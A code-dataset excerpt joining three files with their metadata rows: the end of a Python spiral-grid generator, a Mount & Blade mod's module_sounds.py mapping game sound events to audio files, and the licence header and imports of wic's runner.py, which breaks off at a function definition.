offset1 = (clip1 % 2) * square//2
for p in cls.spiral_inner(pow(clip1+1, 2)):
yield tuple(
v + # start co-ordinate
max(-clip2, # clamp low
min(clip2, # clamp high
offset1 + # apply offset for even-numbered grids
w * square)) # operate in steps of square
for v, w in zip(start, p)) # zip current spiral coords with start coords
@classmethod
def spiral_inner(cls, m):
yield (0, 0)
m -= 1
d = lambda a: (0, 1, 0, -1)[a % 4]
x = z = 0
i = 2
while m > 0:
for j in range(i >> 1):
x += d(i)
z += d(i+1)
yield (x, z)
m -= 1
if m == 0:
break
i += 1 | mit | 1,341,538,299,758,088,200 | 30.055556 | 90 | 0.385855 | false |
hakjimmy/cngame | module_sounds.py | 1 | 23515 | from header_sounds import *
# Many of these sound entries are hard coded into the engine, and should not be removed; to disable them, empty the sound file list.
# Add your own sounds just before the animation sounds group, or before sounds_end.
sounds = [
("click", sf_2d|sf_priority_9|sf_vol_3, ["drum_3.ogg"]),
("tutorial_1", sf_2d|sf_priority_9|sf_vol_7, ["tutorial_1.ogg"]),
("tutorial_2", sf_2d|sf_priority_9|sf_vol_7, ["tutorial_2.ogg"]),
("gong", sf_2d|sf_priority_9|sf_vol_7, ["s_cymbals.ogg"]),
("quest_taken", sf_2d|sf_priority_9|sf_vol_7, []),
("quest_completed", sf_2d|sf_priority_9|sf_vol_8, ["quest_completed.ogg"]),
("quest_succeeded", sf_2d|sf_priority_9|sf_vol_6, ["quest_succeeded.ogg"]),
("quest_concluded", sf_2d|sf_priority_9|sf_vol_7, ["drum_3.ogg"]),
("quest_failed", sf_2d|sf_priority_9|sf_vol_7, ["quest_failed.ogg"]),
("quest_cancelled", sf_2d|sf_priority_9|sf_vol_7, ["quest_cancelled.ogg"]),
("rain", sf_2d|sf_priority_2|sf_vol_4|sf_looping, ["rain_1.ogg"]),
("money_received", sf_priority_5|sf_vol_4, ["coins_dropped_1.ogg"]),
("money_paid", sf_priority_5|sf_vol_4, ["coins_dropped_2.ogg"]),
("sword_clash_1", 0, ["sword_clank_metal_09.ogg","sword_clank_metal_09b.ogg","sword_clank_metal_10.ogg","sword_clank_metal_10b.ogg","sword_clank_metal_12.ogg","sword_clank_metal_12b.ogg","sword_clank_metal_13.ogg","sword_clank_metal_13b.ogg"]),
("sword_clash_2", 0, ["drum_3.ogg"]),
("sword_clash_3", 0, ["drum_3.ogg"]),
("sword_swing", sf_priority_12|sf_vol_8, ["s_swordSwing.wav"]),
("footstep_grass", sf_priority_1|sf_vol_4, ["footstep_1.ogg","footstep_2.ogg","footstep_3.ogg","footstep_4.ogg"]),
("footstep_wood", sf_priority_1|sf_vol_6, ["footstep_wood_1.ogg","footstep_wood_2.ogg","footstep_wood_4.ogg"]),
("footstep_water", sf_priority_3|sf_vol_4, ["water_walk_1.ogg","water_walk_2.ogg","water_walk_3.ogg","water_walk_4.ogg"]),
("footstep_horse", sf_priority_3|sf_vol_8, ["drum_3.ogg"]),
("footstep_horse_1b", sf_priority_3|sf_vol_8, ["s_footstep_horse_4b.wav","s_footstep_horse_4f.wav","s_footstep_horse_5b.wav","s_footstep_horse_5f.wav"]),
("footstep_horse_1f", sf_priority_3|sf_vol_8, ["s_footstep_horse_2b.wav","s_footstep_horse_2f.wav","s_footstep_horse_3b.wav","s_footstep_horse_3f.wav"]),
("footstep_horse_2b", sf_priority_3|sf_vol_8, ["s_footstep_horse_2b.wav"]),
("footstep_horse_2f", sf_priority_3|sf_vol_8, ["s_footstep_horse_2f.wav"]),
("footstep_horse_3b", sf_priority_3|sf_vol_8, ["s_footstep_horse_3b.wav"]),
("footstep_horse_3f", sf_priority_3|sf_vol_8, ["s_footstep_horse_3f.wav"]),
("footstep_horse_4b", sf_priority_3|sf_vol_8, ["s_footstep_horse_4b.wav"]),
("footstep_horse_4f", sf_priority_3|sf_vol_8, ["s_footstep_horse_4f.wav"]),
("footstep_horse_5b", sf_priority_3|sf_vol_8, ["s_footstep_horse_5b.wav"]),
("footstep_horse_5f", sf_priority_3|sf_vol_8, ["s_footstep_horse_5f.wav"]),
("jump_begin", sf_priority_9|sf_vol_7, ["jump_begin.ogg"]),
("jump_end", sf_priority_9|sf_vol_5, ["jump_end.ogg"]),
("jump_begin_water", sf_priority_9|sf_vol_4, ["jump_begin_water.ogg"]),
("jump_end_water", sf_priority_9|sf_vol_4, ["jump_end_water.ogg"]),
("horse_jump_begin", sf_priority_9|sf_vol_4, ["horse_jump_begin.ogg"]),
("horse_jump_end", sf_priority_9|sf_vol_4, ["horse_jump_end.ogg"]),
("horse_jump_begin_water", sf_priority_9|sf_vol_5, ["jump_begin_water.ogg"]),
("horse_jump_end_water", sf_priority_9|sf_vol_5, ["jump_end_water.ogg"]),
("release_bow", sf_priority_10|sf_vol_5, ["release_bow_1.ogg"]),
("release_crossbow", sf_priority_10|sf_vol_7, ["release_crossbow_1.ogg"]),
("throw_javelin", sf_priority_10|sf_vol_5, ["throw_javelin_2.ogg"]),
("throw_axe", sf_priority_10|sf_vol_7, ["throw_axe_1.ogg"]),
("throw_knife", sf_priority_10|sf_vol_5, ["throw_knife_1.ogg"]),
("throw_stone", sf_priority_10|sf_vol_7, ["throw_stone_1.ogg"]),
("reload_crossbow", sf_priority_8|sf_vol_3, ["reload_crossbow_1.ogg"]),
("reload_crossbow_continue", sf_priority_4|sf_vol_6, ["put_back_dagger.ogg"]),
("pull_bow", sf_priority_10|sf_vol_4, ["pull_bow_1.ogg"]),
("pull_arrow", sf_priority_4|sf_vol_5, ["pull_arrow.ogg"]),
("arrow_pass_by", sf_priority_9|sf_vol_10, ["arrow_pass_by_1.ogg","arrow_pass_by_2.ogg","arrow_pass_by_3.ogg","arrow_pass_by_4.ogg"]),
("bolt_pass_by", sf_priority_9|sf_vol_10, ["bolt_pass_by_1.ogg"]),
("javelin_pass_by", sf_priority_9|sf_vol_10, ["javelin_pass_by_1.ogg","javelin_pass_by_2.ogg"]),
("stone_pass_by", sf_priority_9|sf_vol_9, ["stone_pass_by_1.ogg"]),
("axe_pass_by", sf_priority_9|sf_vol_10, ["axe_pass_by_1.ogg"]),
("knife_pass_by", sf_priority_9|sf_vol_10, ["knife_pass_by_1.ogg"]),
("bullet_pass_by", sf_priority_9|sf_vol_10, ["arrow_whoosh_1.ogg"]),
("incoming_arrow_hit_ground", sf_priority_7|sf_vol_7, ["arrow_hit_ground_2.ogg","arrow_hit_ground_3.ogg","incoming_bullet_hit_ground_1.ogg"]),
("incoming_bolt_hit_ground", sf_priority_7|sf_vol_7, ["arrow_hit_ground_2.ogg","arrow_hit_ground_3.ogg","incoming_bullet_hit_ground_1.ogg"]),
("incoming_javelin_hit_ground", sf_priority_7|sf_vol_7, ["incoming_javelin_hit_ground_1.ogg"]),
("incoming_stone_hit_ground", sf_priority_7|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("incoming_axe_hit_ground", sf_priority_7|sf_vol_7, ["incoming_javelin_hit_ground_1.ogg"]),
("incoming_knife_hit_ground", sf_priority_7|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("incoming_bullet_hit_ground", sf_priority_7|sf_vol_7, ["incoming_bullet_hit_ground_1.ogg"]),
("outgoing_arrow_hit_ground", sf_priority_6|sf_vol_7, ["outgoing_arrow_hit_ground.ogg"]),
("outgoing_bolt_hit_ground", sf_priority_6|sf_vol_7, ["outgoing_arrow_hit_ground.ogg"]),
("outgoing_javelin_hit_ground", sf_priority_6|sf_vol_10, ["outgoing_arrow_hit_ground.ogg"]),
("outgoing_stone_hit_ground", sf_priority_6|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("outgoing_axe_hit_ground", sf_priority_6|sf_vol_7, ["incoming_javelin_hit_ground_1.ogg"]),
("outgoing_knife_hit_ground", sf_priority_6|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("outgoing_bullet_hit_ground", sf_priority_6|sf_vol_7, ["incoming_bullet_hit_ground_1.ogg"]),
("draw_sword", sf_priority_8|sf_vol_4, ["draw_sword.ogg"]),
("put_back_sword", sf_priority_6|sf_vol_4, ["put_back_sword.ogg"]),
("draw_greatsword", sf_priority_9|sf_vol_4, ["draw_greatsword.ogg"]),
("put_back_greatsword", sf_priority_6|sf_vol_4, ["put_back_sword.ogg"]),
("draw_axe", sf_priority_8|sf_vol_4, ["draw_mace.ogg"]),
("put_back_axe", sf_priority_6|sf_vol_4, ["put_back_to_holster.ogg"]),
("draw_greataxe", sf_priority_9|sf_vol_4, ["draw_greataxe.ogg"]),
("put_back_greataxe", sf_priority_6|sf_vol_4, ["put_back_to_leather.ogg"]),
("draw_spear", sf_priority_7|sf_vol_4, ["draw_spear.ogg"]),
("put_back_spear", sf_priority_5|sf_vol_4, ["put_back_to_leather.ogg"]),
("draw_crossbow", sf_priority_7|sf_vol_4, ["draw_crossbow.ogg"]),
("put_back_crossbow", sf_priority_5|sf_vol_4, ["put_back_to_leather.ogg"]),
("draw_revolver", sf_priority_8|sf_vol_4, ["draw_from_holster.ogg"]),
("put_back_revolver", sf_priority_6|sf_vol_4, ["put_back_to_holster.ogg"]),
("draw_dagger", sf_priority_8|sf_vol_4, ["draw_dagger.ogg"]),
("put_back_dagger", sf_priority_6|sf_vol_4, ["put_back_dagger.ogg"]),
("draw_bow", sf_priority_7|sf_vol_4, ["draw_bow.ogg"]),
("put_back_bow", sf_priority_5|sf_vol_4, ["put_back_to_holster.ogg"]),
("draw_shield", sf_priority_4|sf_vol_3, ["draw_shield.ogg"]),
("put_back_shield", sf_priority_4|sf_vol_3, ["put_back_shield.ogg"]),
("draw_other", sf_priority_8|sf_vol_4, ["draw_other.ogg"]),
("put_back_other", sf_priority_6|sf_vol_4, ["draw_other2.ogg"]),
("body_fall_small", sf_priority_7|sf_vol_8, ["body_fall_small_1.ogg","body_fall_small_2.ogg"]),
("body_fall_big", sf_priority_9|sf_vol_9, ["body_fall_1.ogg","body_fall_2.ogg","body_fall_3.ogg"]),
("horse_body_fall_begin", sf_priority_9|sf_vol_10, ["horse_body_fall_begin_1.ogg"]),
("horse_body_fall_end", sf_priority_9|sf_vol_10, ["horse_body_fall_end_1.ogg","body_fall_2.ogg"]),
("hit_wood_wood", sf_priority_11|sf_vol_9, ["hit_wood_wood_1.ogg","hit_wood_wood_2.ogg","hit_wood_wood_3.ogg","hit_wood_wood_4.ogg","hit_wood_metal_4.ogg","hit_wood_metal_5.ogg","hit_wood_metal_6.ogg"]),
("hit_metal_metal", sf_priority_11|sf_vol_10, ["hit_metal_metal_3.ogg","hit_metal_metal_4.ogg","hit_metal_metal_5.ogg","hit_metal_metal_6.ogg","hit_metal_metal_7.ogg","hit_metal_metal_8.ogg","hit_metal_metal_9.ogg","hit_metal_metal_10.ogg","clang_metal_1.ogg","clang_metal_2.ogg"]),
("hit_wood_metal", sf_priority_11|sf_vol_10, ["hit_metal_metal_1.ogg","hit_metal_metal_2.ogg","hit_wood_metal_7.ogg"]),
("shield_hit_wood_wood", sf_priority_11|sf_vol_10, ["shield_hit_wood_wood_1.ogg","shield_hit_wood_wood_2.ogg","shield_hit_wood_wood_3.ogg"]),
("shield_hit_metal_metal", sf_priority_11|sf_vol_10, ["shield_hit_metal_metal_1.ogg","shield_hit_metal_metal_2.ogg","shield_hit_metal_metal_3.ogg","shield_hit_metal_metal_4.ogg"]),
("shield_hit_wood_metal", sf_priority_11|sf_vol_10, ["shield_hit_cut_3.ogg","shield_hit_cut_4.ogg","shield_hit_cut_5.ogg","shield_hit_cut_10.ogg"]),
("shield_hit_metal_wood", sf_priority_11|sf_vol_10, ["shield_hit_metal_wood_1.ogg","shield_hit_metal_wood_2.ogg","shield_hit_metal_wood_3.ogg"]),
("shield_broken", sf_priority_12|sf_vol_10, ["shield_broken.ogg"]),
("man_hit", sf_priority_11|sf_vol_8, ["man_hit_5.ogg","man_hit_6.ogg","man_hit_7.ogg","man_hit_8.ogg","man_hit_9.ogg","man_hit_10.ogg","man_hit_11.ogg","man_hit_12.ogg","man_hit_13.ogg","man_hit_14.ogg","man_hit_15.ogg","man_hit_17.ogg","man_hit_18.ogg","man_hit_19.ogg","man_hit_22.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg","man_hit_59.ogg"]),
("man_die", sf_priority_12|sf_vol_10, ["man_death_1.ogg","man_death_8.ogg","man_death_8b.ogg","man_death_11.ogg","man_death_14.ogg","man_death_16.ogg","man_death_18.ogg","man_death_21.ogg","man_death_22.ogg","man_death_29.ogg","man_death_40.ogg","man_death_44.ogg","man_death_46.ogg","man_death_48.ogg","man_death_64.ogg"]),
("woman_hit", sf_priority_11|sf_vol_8, ["woman_hit_2.ogg","woman_hit_3.ogg","woman_hit_b_2.ogg","woman_hit_b_4.ogg","woman_hit_b_6.ogg","woman_hit_b_7.ogg","woman_hit_b_8.ogg","woman_hit_b_11.ogg","woman_hit_b_14.ogg","woman_hit_b_16.ogg"]),
("woman_die", sf_priority_12|sf_vol_10, ["woman_fall_1.ogg","woman_hit_b_5.ogg"]),
("woman_yell", sf_priority_9|sf_vol_8, ["woman_yell_1.ogg","woman_yell_2.ogg"]),
("hide", 0, ["s_hide.wav"]),
("unhide", 0, ["s_unhide.wav"]),
("neigh", sf_priority_1|sf_vol_1, []),
("gallop", sf_priority_10|sf_vol_3, ["horse_gallop_3.ogg","horse_gallop_4.ogg","horse_gallop_5.ogg"]),
("battle", sf_priority_10|sf_vol_4, ["battle.ogg"]),
("arrow_hit_body", sf_priority_9|sf_vol_10, ["arrow_hit_body_1.ogg","arrow_hit_body_2.ogg","arrow_hit_body_3.ogg"]),
("metal_hit_low_armor_low_damage", sf_priority_8|sf_vol_9, ["sword_hit_lo_armor_lo_dmg_1.ogg","sword_hit_lo_armor_lo_dmg_2.ogg","sword_hit_lo_armor_lo_dmg_3.ogg"]),
("metal_hit_low_armor_high_damage", sf_priority_10|sf_vol_9, ["sword_hit_lo_armor_hi_dmg_1.ogg","sword_hit_lo_armor_hi_dmg_2.ogg","sword_hit_lo_armor_hi_dmg_3.ogg"]),
("metal_hit_high_armor_low_damage", sf_priority_8|sf_vol_9, ["metal_hit_high_armor_low_damage.ogg","metal_hit_high_armor_low_damage_2.ogg","metal_hit_high_armor_low_damage_3.ogg"]),
("metal_hit_high_armor_high_damage", sf_priority_10|sf_vol_9, ["sword_hit_hi_armor_hi_dmg_1.ogg","sword_hit_hi_armor_hi_dmg_2.ogg","sword_hit_hi_armor_hi_dmg_3.ogg"]),
("wooden_hit_low_armor_low_damage", sf_priority_8|sf_vol_9, ["blunt_hit_low_1.ogg","blunt_hit_low_2.ogg","blunt_hit_low_3.ogg"]),
("wooden_hit_low_armor_high_damage", sf_priority_10|sf_vol_9, ["blunt_hit_high_1.ogg","blunt_hit_high_2.ogg","blunt_hit_high_3.ogg"]),
("wooden_hit_high_armor_low_damage", sf_priority_8|sf_vol_9, ["wooden_hit_high_armor_low_damage_1.ogg","wooden_hit_high_armor_low_damage_2.ogg"]),
("wooden_hit_high_armor_high_damage", sf_priority_10|sf_vol_9, ["blunt_hit_high_1.ogg","blunt_hit_high_2.ogg","blunt_hit_high_3.ogg"]),
("mp_arrow_hit_target", sf_2d|sf_priority_10|sf_vol_9, ["mp_arrow_hit_target.ogg"]),
("blunt_hit", sf_priority_9|sf_vol_9, ["punch_1.ogg","punch_4.ogg","punch_4.ogg","punch_5.ogg"]),
("player_hit_by_arrow", sf_priority_10|sf_vol_10, ["player_hit_by_arrow.ogg"]),
("release_crossbow_medium", sf_priority_4|sf_vol_7, ["release_crossbow_1.ogg"]),
("release_crossbow_far", sf_priority_3|sf_vol_7, ["release_crossbow_1.ogg"]),
("bullet_hit_body", sf_priority_6|sf_vol_7, ["player_hit_by_arrow.ogg"]),
("player_hit_by_bullet", sf_priority_10|sf_vol_10, ["player_hit_by_arrow.ogg"]),
("pistol_shot", sf_priority_12|sf_vol_10, ["fl_pistol.wav"]),
("man_grunt", sf_priority_6|sf_vol_4, ["man_excercise_1.ogg","man_excercise_2.ogg","man_excercise_4.ogg"]),
("man_breath_hard", sf_priority_7|sf_vol_8, ["man_ugh_1.ogg","man_ugh_2.ogg","man_ugh_4.ogg","man_ugh_7.ogg","man_ugh_12.ogg","man_ugh_13.ogg","man_ugh_17.ogg"]),
("man_stun", sf_priority_9|sf_vol_8, ["man_stun_1.ogg"]),
("man_grunt_long", sf_priority_7|sf_vol_7, ["man_grunt_1.ogg","man_grunt_2.ogg","man_grunt_3.ogg","man_grunt_5.ogg","man_grunt_13.ogg","man_grunt_14.ogg"]),
("man_yell", sf_priority_6|sf_vol_8, ["man_yell_4.ogg","man_yell_4_2.ogg","man_yell_7.ogg","man_yell_9.ogg","man_yell_11.ogg","man_yell_13.ogg","man_yell_15.ogg","man_yell_16.ogg","man_yell_17.ogg","man_yell_20.ogg","man_shortyell_4.ogg","man_shortyell_5.ogg","man_shortyell_6.ogg","man_shortyell_9.ogg","man_shortyell_11.ogg","man_shortyell_11b.ogg","man_yell_b_18.ogg","man_yell_22.ogg", "man_yell_c_20.ogg"]),
("man_warcry", sf_priority_8|sf_vol_10, ["man_insult_2.ogg","man_insult_3.ogg","man_insult_7.ogg","man_insult_9.ogg","man_insult_13.ogg","man_insult_15.ogg","man_insult_16.ogg"]),
("encounter_looters", sf_priority_8|sf_vol_8, ["encounter_river_pirates_5.ogg","encounter_river_pirates_6.ogg","encounter_river_pirates_9.ogg","encounter_river_pirates_10.ogg","encounter_river_pirates_4.ogg"]),
("encounter_bandits", sf_priority_8|sf_vol_8, ["encounter_bandit_2.ogg","encounter_bandit_9.ogg","encounter_bandit_12.ogg","encounter_bandit_13.ogg","encounter_bandit_15.ogg","encounter_bandit_16.ogg","encounter_bandit_10.ogg",]),
("encounter_farmers", sf_priority_8|sf_vol_8, ["encounter_farmer_2.ogg","encounter_farmer_5.ogg","encounter_farmer_7.ogg","encounter_farmer_9.ogg"]),
("encounter_sea_raiders", sf_priority_8|sf_vol_8, ["encounter_sea_raider_5.ogg","encounter_sea_raider_9.ogg","encounter_sea_raider_9b.ogg","encounter_sea_raider_10.ogg"]),
("encounter_steppe_bandits", sf_priority_8|sf_vol_8, ["encounter_steppe_bandit_3.ogg","encounter_steppe_bandit_3b.ogg","encounter_steppe_bandit_8.ogg","encounter_steppe_bandit_10.ogg","encounter_steppe_bandit_12.ogg"]),
("encounter_nobleman", sf_priority_8|sf_vol_8, ["encounter_nobleman_1.ogg"]),
("encounter_vaegirs_ally", sf_priority_8|sf_vol_8, ["encounter_vaegirs_ally.ogg","encounter_vaegirs_ally_2.ogg"]),
("encounter_vaegirs_neutral", sf_priority_8|sf_vol_8, ["encounter_vaegirs_neutral.ogg","encounter_vaegirs_neutral_2.ogg","encounter_vaegirs_neutral_3.ogg","encounter_vaegirs_neutral_4.ogg"]),
("encounter_vaegirs_enemy", sf_priority_8|sf_vol_8, ["encounter_vaegirs_neutral.ogg","encounter_vaegirs_neutral_2.ogg","encounter_vaegirs_neutral_3.ogg","encounter_vaegirs_neutral_4.ogg"]),
("sneak_town_halt", sf_priority_8|sf_vol_10, ["sneak_halt_1.ogg","sneak_halt_2.ogg"]),
("horse_walk", sf_priority_3|sf_vol_3, ["horse_walk_1.ogg","horse_walk_2.ogg","horse_walk_3.ogg","horse_walk_4.ogg"]),
("horse_trot", sf_priority_3|sf_vol_3, ["horse_trot_1.ogg","horse_trot_2.ogg","horse_trot_3.ogg","horse_trot_4.ogg"]),
("horse_canter", sf_priority_4|sf_vol_4, ["horse_canter_1.ogg","horse_canter_2.ogg","horse_canter_3.ogg","horse_canter_4.ogg"]),
("horse_gallop", sf_priority_5|sf_vol_4, ["horse_gallop_6.ogg","horse_gallop_7.ogg","horse_gallop_8.ogg","horse_gallop_9.ogg"]),
("horse_breath", sf_priority_1|sf_vol_4, ["horse_breath_4.ogg","horse_breath_5.ogg","horse_breath_6.ogg","horse_breath_7.ogg"]),
("horse_snort", sf_priority_1|sf_vol_1, ["horse_snort_1.ogg","horse_snort_2.ogg","horse_snort_3.ogg","horse_snort_4.ogg","horse_snort_5.ogg"]),
("horse_low_whinny", sf_priority_8|sf_vol_12, ["horse_whinny-1.ogg","horse_whinny-2.ogg"]),
("block_fist", sf_priority_9|sf_vol_10, ["block_fist_3.ogg","block_fist_4.ogg"]),
("man_hit_blunt_weak", sf_priority_9|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_blunt_strong", sf_priority_10|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_pierce_weak", sf_priority_9|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_pierce_strong", sf_priority_10|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_cut_weak", sf_priority_9|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_cut_strong", sf_priority_10|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_victory", sf_priority_5|sf_vol_10, ["man_victory_3.ogg","man_victory_4.ogg","man_victory_5.ogg","man_victory_8.ogg","man_victory_15.ogg","man_victory_49.ogg","man_victory_52.ogg","man_victory_54.ogg","man_victory_57.ogg","man_victory_71.ogg"]),
("fire_loop", sf_priority_5|sf_vol_15|sf_looping|sf_start_at_random_pos, ["Fire_Torch_Loop3.ogg"]),
("torch_loop", sf_priority_4|sf_vol_15|sf_looping|sf_start_at_random_pos, ["Fire_Torch_Loop3.ogg"]),
("dummy_hit", sf_priority_6|sf_vol_10, ["shield_hit_cut_3.ogg","shield_hit_cut_5.ogg"]),
("dummy_destroyed", sf_priority_7|sf_vol_10, ["shield_broken.ogg"]),
("gourd_destroyed", sf_priority_7|sf_vol_10, ["shield_broken.ogg"]),
("cow_moo", sf_priority_6|sf_vol_12, ["cow_moo_1.ogg"]),
("cow_slaughter", sf_priority_9|sf_vol_12, ["cow_slaughter.ogg"]),
("distant_dog_bark", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_dog1.ogg","d_dog2.ogg","d_dog3.ogg","d_dog7.ogg"]),
("distant_owl", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_owl2.ogg","d_owl3.ogg","d_owl4.ogg"]),
("distant_chicken", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_chicken1.ogg","d_chicken2.ogg"]),
("distant_carpenter", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_carpenter1.ogg","d_saw_short3.ogg"]),
("distant_blacksmith", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_blacksmith2.ogg"]),
("arena_ambiance", sf_2d|sf_priority_5|sf_vol_15|sf_looping|sf_stream_from_hd, ["arena_loop11.ogg"]),
("town_ambiance", sf_2d|sf_priority_5|sf_vol_15|sf_looping|sf_stream_from_hd, ["town_loop_3.ogg"]),
("tutorial_fail", sf_2d|sf_priority_10|sf_vol_7,["cue_failure.ogg"]),
("your_flag_taken", sf_2d|sf_priority_10|sf_vol_10, ["your_flag_taken.ogg"]),
("enemy_flag_taken", sf_2d|sf_priority_10|sf_vol_10, ["enemy_flag_taken.ogg"]),
("flag_returned", sf_2d|sf_priority_10|sf_vol_10, ["your_flag_returned.ogg"]),
("team_scored_a_point", sf_2d|sf_priority_10|sf_vol_10, ["you_scored_a_point.ogg"]),
("enemy_scored_a_point", sf_2d|sf_priority_10|sf_vol_10, ["enemy_scored_a_point.ogg"]),
("failure", sf_2d|sf_priority_6|sf_vol_5, ["cue_failure.ogg"]),
("man_yawn", sf_priority_6|sf_vol_10, ["man_yawn_1.ogg"]),
("man_cough", sf_priority_6|sf_vol_10, ["man_cough_1.ogg","man_cough_2.ogg","man_cough_3.ogg"]),
("man_drown", sf_priority_9|sf_vol_10, ["man_stun_1.ogg","man_ugh_7.ogg","man_ugh_13.ogg","man_ugh_17.ogg"]),
("woman_drown", sf_priority_9|sf_vol_10, ["woman_hit_b_2.ogg","woman_hit_2.ogg"]),
("cut_wood", sf_priority_9|sf_vol_10, ["shield_hit_cut_3.ogg","shield_hit_cut_5.ogg"]),
("cut_wood_break", sf_priority_10|sf_vol_10, ["shield_hit_cut_4.ogg"]),
("cut_wood_scratch", sf_priority_6|sf_vol_10, ["wooden_hit_high_armor_low_damage_1.ogg","wooden_hit_high_armor_low_damage_2b.ogg"]),
("mining_hit", sf_priority_9|sf_vol_10, ["hit_wood_metal_7.ogg","hit_metal_metal_1.ogg","hit_metal_metal_2.ogg","hit_metal_metal_4.ogg","hit_metal_metal_5.ogg"]),
("mining_scratch", sf_priority_6|sf_vol_10, ["hit_metal_metal_3.ogg","hit_metal_metal_6.ogg"]),
("repair_wood", sf_priority_9|sf_vol_10, ["hit_wood_wood_2.ogg","hit_wood_wood_3.ogg","hit_wood_wood_4.ogg","hit_wood_metal_4.ogg","hit_wood_metal_5.ogg"]),
("saw_wood", sf_priority_7|sf_vol_10, ["d_saw_short3.ogg"]),
("blacksmith", sf_priority_7|sf_vol_10, ["d_blacksmith2.ogg"]),
("damage_ship", sf_priority_9|sf_vol_10, ["shield_broken.ogg"]),
("lock", sf_priority_10|sf_vol_10, ["hit_wood_metal_6.ogg"]),
("pick_lock_fail", sf_priority_10|sf_vol_10, ["hit_wood_wood_1.ogg"]),
("fire", sf_priority_6|sf_vol_10, ["Fire_Small_Crackle_Slick_op.ogg"]),
("horse_neigh", sf_priority_8|sf_vol_10, ["horse_exterior_whinny_01.ogg","horse_exterior_whinny_02.ogg","horse_exterior_whinny_03.ogg","horse_exterior_whinny_04.ogg","horse_exterior_whinny_05.ogg","horse_whinny.ogg"]),
("pull_flax", sf_priority_6|sf_vol_3, ["draw_other.ogg"]),
("away_vile_beggar", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_nobleman_1.ogg"]),
("my_lord", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_farmer_7.ogg","encounter_farmer_9.ogg"]),
("almost_harvesting_season", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_farmer_2.ogg"]),
("whats_this_then", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_river_pirates_5.ogg"]),
("out_for_a_stroll_are_we", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_river_pirates_6.ogg"]),
("we_ride_to_war", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_vaegirs_neutral_2.ogg","encounter_vaegirs_ally.ogg"]),
("less_talking_more_raiding", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_sea_raider_10.ogg"]),
("you_there_stop", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["sneak_halt_1.ogg","sneak_halt_2.ogg"]),
("tear_you_limb_from_limb", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a3.ogg"]),
("better_not_be_a_manhunter", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a1.ogg"]),
("drink_from_your_skull", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a2.ogg"]),
("gods_will_decide_your_fate", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_sea_raider_9.ogg"]),
("nice_head_on_shoulders", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a4.ogg"]),
("hunt_you_down", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a5.ogg","man_yell_a6.ogg"]),
("dead_men_tell_no_tales", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_yell_a6.ogg"]),
("leigu", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["tiaozhan.ogg"]),
("leigu2", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["guanyu.ogg"]),
("stand_and_deliver", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_12.ogg"]),
("your_money_or_your_life", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_2.ogg","encounter_steppe_bandit_12.ogg"]),
("have_our_pay_or_fun", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_10.ogg"]),
("word_about_purse_belongings", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_13.ogg"]),
("easy_way_or_hard_way", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_15.ogg"]),
("everything_has_a_price", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_16.ogg"]),
("slit_your_throat", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_9.ogg"]),
("sounds_end", 0, []),
]
| bsd-3-clause | -4,885,153,509,289,498,000 | 94.202429 | 413 | 0.672124 | false |
schleichdi2/OPENNFR-6.1-CORE | opennfr-openembedded-core/scripts/lib/wic/utils/runner.py | 1 | 1774 | #!/usr/bin/env python -tt
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import subprocess
from wic import WicError
def runtool(cmdln_or_args):
